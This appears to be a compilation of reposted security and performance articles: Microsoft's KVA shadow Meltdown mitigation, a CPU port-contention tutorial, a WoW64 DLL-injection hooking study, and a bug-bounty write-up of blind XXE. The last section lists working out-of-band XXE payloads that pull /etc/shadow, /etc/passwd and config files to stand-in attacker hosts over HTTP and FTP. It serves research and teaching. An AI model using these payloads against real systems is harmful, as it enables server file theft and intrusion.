Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before. A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, that necessitated a security update which changed how the operating system manages memory and trap and exception dispatching, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications. Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure. Conclusion Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor. 
In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity, and especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities.

Ken Johnson, Microsoft Security Response Center (MSRC)

Source: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
  4. Understanding CPU port contention. 21 Mar 2018

I continue writing about the performance of processors, and today I want to show some examples of issues that can arise in the CPU backend. In particular, today’s topic is CPU port contention. Modern processors have multiple execution units. For example, in the SandyBridge family there are 6 execution ports:

- Ports 0, 1, 5 are for arithmetic and logic operations (ALU).
- Ports 2, 3 are for memory reads.
- Port 4 is for memory writes.

Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, present easy-to-understand pipeline diagrams and even try IACA. It will be very interesting, so keep on reading!

Disclaimer: I don’t want to describe the nuances of the IvyBridge architecture, but rather to show how port contention might look in practice.

Utilizing full capacity of the load instructions

In my IvyBridge CPU I have 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let’s look at the first example, where I read one cache line (64 bytes) in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make the reads within one cache line in order to eliminate cache effects. I will repeat this 1000 times:

max load capacity

    ; esi contains the beginning of the cache line
    ; edi contains number of iterations (1000)
    .loop:
    mov eax, DWORD [esi]
    mov eax, DWORD [esi + 4]
    mov eax, DWORD [esi + 8]
    mov eax, DWORD [esi + 12]
    mov eax, DWORD [esi + 16]
    mov eax, DWORD [esi + 20]
    mov eax, DWORD [esi + 24]
    mov eax, DWORD [esi + 28]
    mov eax, DWORD [esi + 32]
    mov eax, DWORD [esi + 36]
    mov eax, DWORD [esi + 40]
    mov eax, DWORD [esi + 44]
    mov eax, DWORD [esi + 48]
    mov eax, DWORD [esi + 52]
    mov eax, DWORD [esi + 56]
    mov eax, DWORD [esi + 60]
    dec edi
    jnz .loop

I think there will be no issue with loading values into the same eax register, because the CPU will use register renaming to resolve this write-after-write dependency.
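To make the register renaming remark concrete, here is a minimal sketch of the idea in Python. It is an illustration only, not a description of how IvyBridge implements renaming: the `rename` helper and the physical register names `p0`, `p1`, ... are hypothetical, and a real renamer works with a finite physical register file and a free list. The point is simply that each write to `eax` is given a fresh physical register, so the 16 loads do not have to wait on each other.

```python
from itertools import count


def rename(program):
    """Rename architectural registers to fresh physical ones.

    program is a list of (destination, [sources]) tuples.
    Returns a list of (physical_destination, [physical_sources]).
    """
    fresh = count()
    mapping = {}                      # architectural name -> physical name
    renamed = []
    for dest, sources in program:
        phys_sources = []
        for src in sources:
            # A source reads whichever physical register currently holds it.
            if src not in mapping:
                mapping[src] = f"p{next(fresh)}"
            phys_sources.append(mapping[src])
        # Every write gets a brand-new physical register.
        mapping[dest] = f"p{next(fresh)}"
        renamed.append((mapping[dest], phys_sources))
    return renamed


# The 16 loads of the loop body: each writes eax and reads esi.
loads = [("eax", ["esi"]) for _ in range(16)]
renamed_loads = rename(loads)
destinations = [dest for dest, _ in renamed_loads]
print(destinations)
```

All 16 destinations come out distinct while every load still reads the same physical register for `esi`, so in this model no load depends on the result of an earlier one.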
Performance counters that I use

- UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X.
- UOPS_EXECUTED.STALL_CYCLES - Counts number of cycles no uops were dispatched to be executed on this thread.
- UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops were executed per-thread.

Full list of performance counters for IvyBridge can be found here.

Results

I did my experiments on an IvyBridge CPU using the uarch-bench tool.

    Benchmark           Cycles   UOPS.PORT2   UOPS.PORT3   UOPS.PORT5
    max load capacity     8.02         8.00         8.00         1.00

We can see that our 16 loads were scheduled equally between PORT2 and PORT3; each port takes 8 uops. PORT5 takes the macro-fused uop formed from the dec and jnz instructions. The same picture can be observed if we use the IACA tool (good explanation how to use IACA):

    Architecture - IVB
    Throughput Analysis Report
    --------------------------
    Block Throughput: 8.00 Cycles       Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA

    Port Binding In Cycles Per Iteration:
    -------------------------------------------------------------------------
    |  Port  |  0 - DV   |  1  |  2 - D    |  3 - D    |  4  |  5  |
    -------------------------------------------------------------------------
    | Cycles | 0.0   0.0 | 0.0 | 8.0   8.0 | 8.0   8.0 | 0.0 | 1.0 |
    -------------------------------------------------------------------------

    N - port number or number of cycles resource conflict caused delay, DV - Divider pipe (on port 0)
    D - Data fetch pipe (on ports 2 and 3), CP - on a critical path
    F - Macro Fusion with the previous instruction occurred

    | Num Of |              Ports pressure in cycles               |    |
    |  Uops  | 0 - DV |  1  |  2 - D    |  3 - D    |  4  |  5  |    |
    ---------------------------------------------------------------------
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x4]
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x8]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0xc]
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x10]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x14]
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x18]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x1c]
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x20]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x24]
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x28]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x2c]
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x30]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x34]
    |   1    |        |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x38]
    |   1    |        |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x3c]
    |   1    |        |     |           |           |     | 1.0 |    | dec rdi
    |   0F   |        |     |           |           |     |     |    | jnz 0xffffffffffffffbe
    Total Num Of Uops: 17

Why do we have 8 cycles per iteration?

On modern x86 processors a load instruction takes at least 4 cycles to execute even if the data is in the L1 cache, although according to Agner’s instruction_tables.pdf it has 2 cycles of latency. Even with a latency of 2 cycles we would have (16 [loads] * 2 [cycles]) / 2 [ports] = 16 cycles. According to this calculation we should get 16 cycles per iteration. But we are running at 8 cycles per iteration. Why does this happen? Well, like most execution units, load units are also pipelined, meaning that we can start a second load while the first load is in progress on the same port. Let’s draw a simplified pipeline diagram and see what’s going on.

This is a simplified MIPS-like pipeline diagram, where we usually have 5 pipeline stages: F (fetch), D (decode), I (issue), E (execute) or M (memory operation), W (write back).

It is far from the real execution diagram of my CPU; however, I preserved some important constraints of the IvyBridge architecture (IVB):

- The IVB front-end fetches a 16B block of instructions in a 16B aligned window in 1 cycle.
- IVB has 4 decoders, each of which can decode instructions that consist of at least a single uop.
- IVB has 2 pipelined units for doing load operations.
Just to simplify the diagrams I assume a load operation takes 2 cycles. The M1 and M2 stages reflect that in the diagram. It needs to be said that I omitted one important constraint: instructions always retire in program order, and in my later diagrams this is broken (I simply forgot about it when I was making those diagrams). Drawing this kind of diagram usually helps me to understand what is going on inside the processor and to find different sorts of hazards.

Some explanations for this pipeline diagram

- In the first cycle we fetch 4 loads. We can’t fetch LOAD5, because it doesn’t fit in the same 16B aligned window as the first 4 loads.
- In the second cycle we were able to decode all 4 fetched instructions, because they are all single-uop instructions.
- In the third cycle we were able to issue only the first 2 loads. One of them goes to PORT2, the second goes to PORT3. Notice that LOAD3 and LOAD4 are stalled (typically waiting in the Reservation Station).
- Only in cycle #4 were we able to issue LOAD3 and LOAD4, because we know the M1 stages will be free to use in the next cycle.

Continuing this diagram further, we could see that in each cycle we are able to retire 2 loads. We have 16 loads, so that explains why it takes only 8 cycles per iteration. I made an additional experiment to prove this theory. I collected some more performance counters:

    Benchmark           Cycles   CYCLES_GE_3_UOP_EXEC   CYCLES_GE_2_UOP_EXEC   CYCLES_GE_1_UOP_EXEC
    max load capacity     8.02                   1.00                   8.00                   8.00

The results above show that in each of the 8 cycles (that it took to execute one iteration) at least 2 uops were issued (two loads issued per cycle). And in one cycle we were able to issue 3 uops (last 2 loads + dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling them in parallel with 2 loads.
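The 8-cycle figure can also be reproduced with a toy issue model. The sketch below is an assumption-laden simplification, not a model of the real IvyBridge scheduler: the `simulate` function is hypothetical, every port is treated as fully pipelined (it accepts one new uop per cycle), and the front-end, data dependencies, and in-order retirement are ignored. It issues the oldest waiting uops first and reports how many cycles it takes to issue one loop iteration.

```python
def simulate(uops, latency):
    """Greedy issue model with fully pipelined ports.

    uops    - list of (kind, allowed_ports) in program order
    latency - dict mapping kind -> execution latency in cycles
    Returns (cycles needed to issue everything, cycle the last uop finishes).
    """
    pending = list(uops)
    cycle = 0
    last_finish = 0
    while pending:
        cycle += 1
        busy = set()                  # ports that already accepted a uop this cycle
        still_waiting = []
        for kind, ports in pending:
            free = [p for p in ports if p not in busy]
            if free:
                busy.add(free[0])
                last_finish = max(last_finish, cycle + latency[kind] - 1)
            else:
                still_waiting.append((kind, ports))
        pending = still_waiting
    return cycle, last_finish


# One loop iteration: 16 loads (ports 2 or 3) and the fused dec/jnz (port 5).
iteration = [("load", (2, 3))] * 16 + [("dec_jnz", (5,))]

issue_2, finish_2 = simulate(iteration, {"load": 2, "dec_jnz": 1})
issue_4, finish_4 = simulate(iteration, {"load": 4, "dec_jnz": 1})
print(issue_2, finish_2, issue_4, finish_4)
```

With a 2-cycle load the model needs 8 cycles to issue the iteration and the last load finishes in cycle 9; with a 4-cycle load it still needs 8 issue cycles and the last load finishes in cycle 11. The latency only shifts when results arrive, while the number of issue cycles per iteration is set by 16 loads sharing 2 ports.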
What is even more interesting is that if we do the simulation with the assumption that a load instruction has 4 cycles of latency, all the conclusions in this example will still be valid, because throughput is what matters (as Travis mentioned in his comment). There will still be 2 retired load instructions each cycle. And that means that our 16 loads (inside each iteration) will retire in 8 cycles.

Utilizing other available ports in parallel

In the example that I presented, I’m only utilizing PORT2 and PORT3, and partially PORT5. What does that mean? Well, it means that we can schedule instructions on other ports in parallel with the loads for free. Let’s try to write such an example. I added one bswap instruction after each pair of loads. This instruction reverses the byte order of a register. It is very helpful for doing big-endian to little-endian conversion and vice versa. There is nothing special about this instruction; I just chose it because it suits my experiments best. According to Agner’s instruction_tables.pdf, the bswap instruction on a 32-bit register is executed on PORT1 and has 1 cycle of latency.
max load capacity + 1 bswap

    ; esi contains the beginning of the cache line
    ; edi contains number of iterations (1000)
    .loop:
    mov eax, DWORD [esi]
    mov eax, DWORD [esi + 4]
    bswap ebx
    mov eax, DWORD [esi + 8]
    mov eax, DWORD [esi + 12]
    bswap ebx
    mov eax, DWORD [esi + 16]
    mov eax, DWORD [esi + 20]
    bswap ebx
    mov eax, DWORD [esi + 24]
    mov eax, DWORD [esi + 28]
    bswap ebx
    mov eax, DWORD [esi + 32]
    mov eax, DWORD [esi + 36]
    bswap ebx
    mov eax, DWORD [esi + 40]
    mov eax, DWORD [esi + 44]
    bswap ebx
    mov eax, DWORD [esi + 48]
    mov eax, DWORD [esi + 52]
    bswap ebx
    mov eax, DWORD [esi + 56]
    mov eax, DWORD [esi + 60]
    bswap ebx
    dec edi
    jnz .loop

Here are the results for this experiment:

    Benchmark                     Cycles   UOPS.PORT1   UOPS.PORT2   UOPS.PORT3   UOPS.PORT5
    max load capacity + 1 bswap     8.03         8.00         8.01         8.01         1.00

The first observation is that we get 8 more bswap instructions for free (we are still running at 8 cycles per iteration), because they do not contend with the load instructions. Let’s look at the pipeline diagram for this case:

We can see that all bswap instructions fit nicely into the pipeline, causing no hazards.

Overutilizing ports

Modern compilers will try to schedule instructions for a particular target architecture to fully utilize all execution ports. But what happens when we try to schedule too many instructions for some execution port? Let’s see.
I added one more bswap instruction after each pair of loads:

port 1 throughput bottleneck

    ; esi contains the beginning of the cache line
    ; edi contains number of iterations (1000)
    .loop:
    mov eax, DWORD [esi]
    mov eax, DWORD [esi + 4]
    bswap ebx
    bswap ecx
    mov eax, DWORD [esi + 8]
    mov eax, DWORD [esi + 12]
    bswap ebx
    bswap ecx
    mov eax, DWORD [esi + 16]
    mov eax, DWORD [esi + 20]
    bswap ebx
    bswap ecx
    mov eax, DWORD [esi + 24]
    mov eax, DWORD [esi + 28]
    bswap ebx
    bswap ecx
    mov eax, DWORD [esi + 32]
    mov eax, DWORD [esi + 36]
    bswap ebx
    bswap ecx
    mov eax, DWORD [esi + 40]
    mov eax, DWORD [esi + 44]
    bswap ebx
    bswap ecx
    mov eax, DWORD [esi + 48]
    mov eax, DWORD [esi + 52]
    bswap ebx
    bswap ecx
    mov eax, DWORD [esi + 56]
    mov eax, DWORD [esi + 60]
    bswap ebx
    bswap ecx
    dec edi
    jnz .loop

When I measured the result using the uarch-bench tool, here is what I received:

    Benchmark                      Cycles   UOPS.PORT1   UOPS.PORT2   UOPS.PORT3   UOPS.PORT5
    port 1 throughput bottleneck    16.00        16.00         8.01         8.01         1.00

To understand why we now run at 16 cycles per iteration, it’s best to look at the pipeline diagram again:

Now it’s clear that we have 16 bswap instructions and only one port that can handle this kind of instruction. So, we can’t go faster than 16 cycles in this case, because the IVB processor executes them sequentially. Different architectures might have more ports that can handle bswap instructions, which may allow them to run faster. By now I hope you understand what port contention is and how to reason about such issues. Know the limitations of your hardware!

Additional resources

More detailed information about the execution ports of your processor can be found in Agner’s microarchitecture.pdf and, for Intel processors, in Intel’s optimization manual. All the assembly examples that I showed in this article are available on my github.

UPD 23.03.2018

Several people mentioned that load instructions can’t have 2 cycles of latency on modern Intel architectures. Agner’s tables seem to be inaccurate there.
I will not redo the diagrams, as that would make them harder to understand and would shift the focus from the actual thing I wanted to explain. Again, I didn’t want to reconstruct how the pipeline diagram looks in reality, but rather to explain the notion of port contention. However, I totally accept the comment, and it should be mentioned. But also, if we assume that a load instruction has 4 cycles of latency in those examples, all the conclusions in the post are still valid, because throughput is what matters (as Travis mentioned in his comment). There will still be 2 retired load instructions per cycle. Another important thing to mention is that hyperthreading helps utilize execution “slots”. See more details in the HackerNews comments.

Source: https://dendibakh.github.io/blog/2018/03/21/port-contention
  5. DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1 By Yarden Shafir and Assaf Carlsbad - March 12, 2018 Introduction This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. 
All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions. Injection Methods Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series. Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL) After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods. Hijacking wow64log.dll As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL, named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. 
Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32.

Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll

The main advantage of this method lies in its sheer simplicity: all it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method. First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it’s not there by default. Second, this method provides little to no control over the injection process, as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc.

Heaven’s Gate

More control over the injection process can be achieved by simply issuing the call to LdrLoadDll() ourselves rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages:

- Gain the ability to execute arbitrary 32-bit code inside the target process.
- Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments.
Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”. “Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, that switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode. Figure 3 – a thread executing x86 code, just prior to its transition to x64 realm. After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules. Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate. We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here. Injection via APC With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: It is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread. 
Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types: Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them. User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section. APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel-space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system. In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()) the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules. The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process. 
Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification: Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other “context” parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure: The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process so using LoadLibrary() and its variants is not possible. The path to the DLL we wish to load into the process. Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments: Figure 6 – A typical “adapter thunk” set as the target of a user-mode APC To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A ). Albeit promising, when attempting to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error. Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle. Appendixes Appendix A – complete source code for APC injection with adapter thunk Sursa: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
  6. Posted on March 24, 2018 by tghawkins
Today, I’d like to share my methodology behind how I found a blind, out-of-band XML external entity (XXE) attack in a private bug bounty program. I have redacted the necessary information to hide the program’s identity.
As with the beginning of any hunter’s quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able to discover a subdomain that caught my interest. I then brute forced the directories of the subdomain, and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page:
I noticed in the response the XML content-type along with an XML body containing SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, finding that the body of the response had disappeared, with a response code of 200.
Since the web application seemed to be responding well to the POST request, instead of issuing a 405 Method Not Allowed error, I decided to issue a request containing XML syntax with the content-type: application/xml.
The resulting response was also different than in the previous cases. This response was also in XML, as it was when issuing the GET request to this endpoint. However, this time the value within the tags is “OK” instead of the original value “TestRequestCalled”. I also tried to send a JSON request to see how the application would respond. Below is the result.
Seeing as how the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to set up my VPS to host a DTD file for the XML processor to “hopefully” parse. Below is the result of the DTD being successfully processed, with the requested file contents appended.
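The out-of-band step described above (a request body that points the XML parser at a DTD hosted on a server you control) can be sketched in Python as follows. This is a minimal illustration, not the author's tooling: the function names are hypothetical, the host, port and file URL are placeholders, and it should only be used against systems you are authorised to test.

```python
def build_external_dtd(callback_host: str, callback_port: int, file_url: str) -> str:
    """Return the text of the DTD to host on the callback server (hypothetical helper)."""
    # %data reads the target file. %param1 declares a second parameter entity
    # (%exfil) whose URL carries the file contents back to the callback host.
    # "&#x25;" is an encoded '%', needed to declare a parameter entity
    # from inside another entity's value.
    return (
        f'<!ENTITY % data SYSTEM "{file_url}">\n'
        f'<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{callback_host}:{callback_port}/?%data;'>\">\n"
    )


def build_request_body(dtd_url: str) -> str:
    """Return the XML body sent to the target; it only references the hosted DTD."""
    return (
        '<?xml version="1.0" ?>\n'
        "<!DOCTYPE r [\n"
        "<!ELEMENT r ANY >\n"
        f'<!ENTITY % sp SYSTEM "{dtd_url}">\n'
        # Order matters: load the DTD, expand the declaration, then trigger the fetch.
        "%sp;\n%param1;\n%exfil;\n"
        "]>\n"
        "<r></r>\n"
    )


if __name__ == "__main__":
    print(build_external_dtd("x.x.x.x", 443, "file:///c:/windows/win.ini"))
    print(build_request_body("http://x.x.x.x:443/ev.xml"))
```

Whether the file contents actually arrive depends on the parser: multi-line files and special characters often break the callback URL, which is why FTP- or error-based variants are sometimes needed.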
I also used this script: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb to set up, and have an ftp server listening so I would also be able to extract the server’s information/file contents through the ftp protocol.
Although this submission was marked as a duplicate, I wanted to share this finding as it was a good learning experience, and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue.
Some helpful XXE payloads:

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>

## External dtd: ##
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;

-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">

------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-------------------------^ you might need to encode this % (depends on your target) as: &#x25;

--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

---------------------------
Inside SOAP body
---------------------------
